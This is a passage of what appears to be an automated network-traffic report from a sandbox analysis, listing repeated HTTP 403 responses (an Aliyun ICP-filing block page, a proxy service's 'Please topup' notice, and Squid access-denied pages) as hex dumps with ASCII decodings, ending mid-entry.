Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:30 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:30 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 